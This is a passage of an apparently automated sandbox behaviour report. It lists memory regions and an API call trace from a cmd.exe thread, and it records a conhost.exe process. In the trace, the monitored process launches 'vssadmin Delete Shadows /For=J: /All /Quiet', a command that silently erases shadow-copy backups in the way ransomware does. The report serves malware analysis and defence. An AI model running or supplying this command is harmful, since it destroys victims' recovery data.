	     region_type = private
	            name = "private_0x00000000047c0000"
	        filename = ""

Region:
	              id = 4620
	        start_va = 0x48c0000
	          end_va = 0x49affff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000048c0000"
	        filename = ""

Region:
	              id = 4621
	        start_va = 0x4350000
	          end_va = 0x4353fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004350000"
	        filename = ""

Region:
	              id = 4696
	        start_va = 0x4360000
	          end_va = 0x4363fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004360000"
	        filename = ""

Region:
	              id = 4733
	        start_va = 0x49b0000
	          end_va = 0x4ce6fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")


Thread:
	id = 331
	os_tid = 0x10f8

	[0294.937] GetProcAddress (hModule=0x76d90000, lpProcName="SetConsoleInputExeNameW") returned 0x746ab440
	[0294.938] GetProcessHeap () returned 0x47c0000
	[0294.938] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0x400a) returned 0x47cb998
	[0294.939] GetProcessHeap () returned 0x47c0000
	[0294.939] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47cb998) returned 1
	[0294.942] _wcsicmp (_String1="vssadmin", _String2=")") returned 77
	[0294.942] _wcsicmp (_String1="FOR", _String2="vssadmin") returned -16
	[0294.942] _wcsicmp (_String1="FOR/?", _String2="vssadmin") returned -16
	[0294.942] _wcsicmp (_String1="IF", _String2="vssadmin") returned -13
	[0294.942] _wcsicmp (_String1="IF/?", _String2="vssadmin") returned -13
	[0294.942] _wcsicmp (_String1="REM", _String2="vssadmin") returned -4
	[0294.942] _wcsicmp (_String1="REM/?", _String2="vssadmin") returned -4
	[0294.942] GetProcessHeap () returned 0x47c0000
	[0294.942] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0x58) returned 0x47c74f8
	[0294.942] GetProcessHeap () returned 0x47c0000
	[0294.942] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0x1a) returned 0x47c9048
	[0294.946] GetProcessHeap () returned 0x47c0000
	[0294.946] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0x52) returned 0x47c9070
	[0294.948] GetConsoleTitleW (in: lpConsoleTitle=0x18f920, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0295.214] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0295.214] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0295.214] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0295.214] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0295.214] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
	[0295.214] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0295.214] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
	[0295.214] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0295.215] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0295.215] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0295.215] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0295.215] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0295.215] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0295.215] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0295.215] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0295.215] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0295.215] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0295.215] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
	[0295.215] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0295.215] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0295.215] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0295.215] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0295.216] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0295.216] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0295.216] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0295.216] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0295.216] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
	[0295.216] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0295.216] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0295.216] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0295.216] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0295.216] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
	[0295.216] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0295.216] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
	[0295.216] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0295.216] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0295.216] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0295.217] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0295.217] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0295.217] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0295.217] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0295.217] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0295.217] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0295.217] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0295.217] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0295.217] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0295.217] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
	[0295.217] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0295.217] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
	[0295.217] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0295.217] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0295.218] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0295.218] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0295.218] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0295.218] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0295.218] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0295.218] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0295.218] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0295.218] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0295.218] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
	[0295.218] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0295.218] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0295.218] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0295.218] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0295.218] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0295.219] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0295.219] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0295.219] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0295.219] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
	[0295.219] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0295.219] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0295.219] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0295.219] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0295.219] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
	[0295.220] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0295.220] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
	[0295.220] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0295.220] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0295.220] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0295.220] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0295.220] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0295.221] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0295.221] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0295.221] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0295.221] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16
	[0295.221] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13
	[0295.221] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4
	[0295.222] GetProcessHeap () returned 0x47c0000
	[0295.222] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0x210) returned 0x47c90d0
	[0295.222] GetProcessHeap () returned 0x47c0000
	[0295.222] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0x64) returned 0x47c92e8
	[0295.223] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19
	[0295.223] GetProcessHeap () returned 0x47c0000
	[0295.223] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0x418) returned 0x47c05c8
	[0295.224] SetErrorMode (uMode=0x0) returned 0x0
	[0295.224] SetErrorMode (uMode=0x1) returned 0x0
	[0295.224] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x47c05d0, lpFilePart=0x18f42c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x18f42c*="Desktop") returned 0x1d
	[0295.224] SetErrorMode (uMode=0x0) returned 0x1
	[0295.225] GetProcessHeap () returned 0x47c0000
	[0295.225] RtlReAllocateHeap (Heap=0x47c0000, Flags=0x0, Ptr=0x47c05c8, Size=0x56) returned 0x47c05c8
	[0295.225] GetProcessHeap () returned 0x47c0000
	[0295.225] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c05c8) returned 0x56
	[0295.225] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x9c
	[0295.225] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0295.226] GetProcessHeap () returned 0x47c0000
	[0295.226] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0x182) returned 0x47c9358
	[0295.226] GetProcessHeap () returned 0x47c0000
	[0295.226] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0x2fc) returned 0x47c0628
	[0295.412] GetProcessHeap () returned 0x47c0000
	[0295.412] RtlReAllocateHeap (Heap=0x47c0000, Flags=0x0, Ptr=0x47c0628, Size=0x184) returned 0x47c0628
	[0295.412] GetProcessHeap () returned 0x47c0000
	[0295.412] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c0628) returned 0x184
	[0295.412] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35
	[0295.412] GetProcessHeap () returned 0x47c0000
	[0295.412] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0xe0) returned 0x47c94e8
	[0295.418] GetProcessHeap () returned 0x47c0000
	[0295.418] RtlReAllocateHeap (Heap=0x47c0000, Flags=0x0, Ptr=0x47c94e8, Size=0x76) returned 0x47c94e8
	[0295.418] GetProcessHeap () returned 0x47c0000
	[0295.418] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c94e8) returned 0x76
	[0295.419] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0295.420] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\vssadmin.*" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18f1b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f1b8) returned 0xffffffff
	[0295.421] GetLastError () returned 0x2
	[0295.421] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0295.421] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\vssadmin.*" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18f1b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f1b8) returned 0xffffffff
	[0295.422] GetLastError () returned 0x2
	[0295.422] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0295.422] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*" (normalized: "c:\\windows\\syswow64\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18f1b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f1b8) returned 0x47c9568
	[0295.423] GetProcessHeap () returned 0x47c0000
	[0295.423] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x0, Size=0x14) returned 0x47c7c50
	[0295.423] FindClose (in: hFindFile=0x47c9568 | out: hFindFile=0x47c9568) returned 1
	[0295.424] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM" (normalized: "c:\\windows\\syswow64\\vssadmin.com"), fInfoLevelId=0x1, lpFindFileData=0x18f1b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f1b8) returned 0xffffffff
	[0295.424] GetLastError () returned 0x2
	[0295.424] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE" (normalized: "c:\\windows\\syswow64\\vssadmin.exe"), fInfoLevelId=0x1, lpFindFileData=0x18f1b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f1b8) returned 0x47c9568
	[0295.424] GetProcessHeap () returned 0x47c0000
	[0295.424] RtlReAllocateHeap (Heap=0x47c0000, Flags=0x0, Ptr=0x47c7c50, Size=0x4) returned 0x47c7358
	[0295.424] FindClose (in: hFindFile=0x47c9568 | out: hFindFile=0x47c9568) returned 1
	[0295.425] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0295.425] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0295.425] GetConsoleTitleW (in: lpConsoleTitle=0x18f6ac, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0295.813] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f5d8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f5bc | out: lpAttributeList=0x18f5d8, lpSize=0x18f5bc) returned 1
	[0295.813] UpdateProcThreadAttribute (in: lpAttributeList=0x18f5d8, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f5c4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f5d8, lpPreviousValue=0x0) returned 1
	[0295.813] GetStartupInfoW (in: lpStartupInfo=0x18f610 | out: lpStartupInfo=0x18f610*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) 
	[0295.814] GetProcessHeap () returned 0x47c0000
	[0295.814] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0x18) returned 0x47c78b0
	[0295.814] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0295.814] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0295.814] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0295.814] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0295.814] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0295.814] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0295.814] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0295.815] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0295.815] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0295.815] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0295.815] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0295.815] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0295.815] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0295.815] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0295.815] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0295.815] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0295.815] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0295.815] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0295.815] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0295.815] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0295.815] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0295.815] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0295.816] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0295.816] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0295.816] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0295.816] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0295.816] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0295.816] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0295.816] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0295.816] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0295.816] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0295.816] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0295.816] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0295.816] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0295.816] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0295.816] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0295.816] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0295.817] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0295.817] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0295.817] GetProcessHeap () returned 0x47c0000
	[0295.817] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c78b0) returned 1
	[0295.817] GetProcessHeap () returned 0x47c0000
	[0295.817] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0xa) returned 0x47c9568
	[0295.817] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1
	[0295.822] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin  Delete Shadows /For=J: /All /Quiet ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x18f560*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin  Delete Shadows /For=J: /All /Quiet ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f5ac | out: lpCommandLine="vssadmin  Delete Shadows /For=J: /All /Quiet ", lpProcessInformation=0x18f5ac*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x1248, dwThreadId=0xd10)) returned 1
	[0295.850] CloseHandle (hObject=0xa4) returned 1
	[0295.850] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0295.851] GetProcessHeap () returned 0x47c0000
	[0295.851] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47cadf0) returned 1
	[0295.851] GetEnvironmentStringsW () returned 0x47ca248*
	[0295.851] GetProcessHeap () returned 0x47c0000
	[0295.851] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0xb9c) returned 0x47cadf0
	[0295.851] memcpy (in: _Dst=0x47cadf0, _Src=0x47ca248, _Size=0xb9c | out: _Dst=0x47cadf0) returned 0x47cadf0
	[0295.851] FreeEnvironmentStringsA (penv="=") returned 1
	[0295.851] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0
	[0310.738] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x18f544 | out: lpExitCode=0x18f544*=0x2) returned 1
	[0310.741] CloseHandle (hObject=0xa8) returned 1
	[0310.753] _vsnwprintf (in: _Buffer=0x18f62c, _BufferCount=0x13, _Format="%08X", _ArgList=0x18f54c | out: _Buffer="00000002") returned 8
	[0310.755] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1
	[0310.756] GetProcessHeap () returned 0x47c0000
	[0310.757] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47cadf0) returned 1
	[0310.757] GetEnvironmentStringsW () returned 0x47ca248*
	[0310.757] GetProcessHeap () returned 0x47c0000
	[0310.757] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0xbc2) returned 0x47cc568
	[0310.757] memcpy (in: _Dst=0x47cc568, _Src=0x47ca248, _Size=0xbc2 | out: _Dst=0x47cc568) returned 0x47cc568
	[0310.758] FreeEnvironmentStringsA (penv="=") returned 1
	[0310.758] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0310.758] GetProcessHeap () returned 0x47c0000
	[0310.758] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47cc568) returned 1
	[0310.758] GetEnvironmentStringsW () returned 0x47ca248*
	[0310.758] GetProcessHeap () returned 0x47c0000
	[0310.758] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0xbc2) returned 0x47cc568
	[0310.758] memcpy (in: _Dst=0x47cc568, _Src=0x47ca248, _Size=0xbc2 | out: _Dst=0x47cc568) returned 0x47cc568
	[0310.759] FreeEnvironmentStringsA (penv="=") returned 1
	[0310.759] GetProcessHeap () returned 0x47c0000
	[0310.759] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c9568) returned 1
	[0310.759] DeleteProcThreadAttributeList (in: lpAttributeList=0x18f5d8 | out: lpAttributeList=0x18f5d8) 
	[0310.759] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0310.759] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1
	[0311.134] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0311.134] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x31f40c | out: lpMode=0x31f40c) returned 1
	[0311.541] _get_osfhandle (_FileHandle=0) returned 0x38
	[0311.542] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x31f408 | out: lpMode=0x31f408) returned 1
	[0311.781] SetConsoleInputExeNameW () returned 0x1
	[0311.782] GetConsoleOutputCP () returned 0x1b5
	[0312.055] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x31f460 | out: lpCPInfo=0x31f460) returned 1
	[0312.055] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0312.209] exit (_Code=2) 

Thread:
	id = 345
	os_tid = 0xd40


Process:
	id = "59"
	image_name = "conhost.exe"
	filename = "c:\\windows\\system32\\conhost.exe"
	page_root = "0x2d32e000"
	os_pid = "0x4d8"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "58"
	os_parent_pid = "0x119c"
	cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"
	cur_dir = "C:\\Windows"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 4430
	        start_va = 0x1b800000
	          end_va = 0x1b9fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000001b800000"
	        filename = ""

Region:
	              id = 4431
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 4432
	        start_va = 0x95db760000
	          end_va = 0x95db79ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000095db760000"
	        filename = ""

Region:
	              id = 4433
	        start_va = 0x95db800000
	          end_va = 0x95db9fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000095db800000"
	        filename = ""

Region:
	              id = 4434
	        start_va = 0x1e419d10000
	          end_va = 0x1e419d2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e419d10000"
	        filename = ""

Region:
	              id = 4435
	        start_va = 0x1e419d30000
	          end_va = 0x1e419d44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e419d30000"
	        filename = ""

Region:
	              id = 4436
	        start_va = 0x7df5ff060000
	          end_va = 0x7ff5ff05ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df5ff060000"
	        filename = ""

Region:
	              id = 4437
	        start_va = 0x7ff7ffbc0000
	          end_va = 0x7ff7ffbe2fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7ffbc0000"
	        filename = ""

Region:
	              id = 4438
	        start_va = 0x7ff7ffcf0000
	          end_va = 0x7ff7ffd00fff
	       monitored = 0
	     entry_point = 0x7ff7ffcf16b0
	     region_type = mapped_file
	            name = "conhost.exe"
	        filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")

Region:
	              id = 4439
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 4440
	        start_va = 0x1e419d50000
	          end_va = 0x1e419fbffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e419d50000"
	        filename = ""

Region:
	              id = 4442
	        start_va = 0x7ff958860000
	          end_va = 0x7ff95890cfff
	       monitored = 0
	     entry_point = 0x7ff9588781a0
	     region_type = mapped_file
	            name = "kernel32.dll"
